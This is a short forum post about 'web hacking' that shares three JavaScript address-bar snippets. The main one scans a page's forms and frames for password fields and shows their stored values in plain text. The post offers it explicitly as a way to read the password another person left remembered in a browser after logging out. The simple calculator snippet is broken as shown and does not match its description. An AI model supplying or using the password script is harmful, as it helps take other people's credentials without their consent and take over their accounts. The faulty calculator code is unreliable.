Hello friends,
Well java is too vast language for me, so i never tried to learn it.. but what i really like is java scripts, i mean if you know how to make java script then you can do lot of stuff on web hacking.
Here i found some java script, use it if you like
View password behind asterisk if any one have logged in to any account and after log out if his password still exist on password field in asterisk form , i mean if he has checked remember my password checkbox.
so type this script in address bar and you will get password in plain text.
i know there are lots of tools available to do that but did you bring every tools with you every time?
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k < w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i < f.length;i++) {var e=f[i].elements;for(var j=0;j < e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}
Simple calculator
Just copy paste this code in address bar and you can calculate simple maths.put your calculation in () like (2+2)
javascript: alert();
Edit Web Page This is just for fun.. at client side if you want to edit web page then copy paste this code in address bar and start editing. as you refresh page it will be in original form.
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0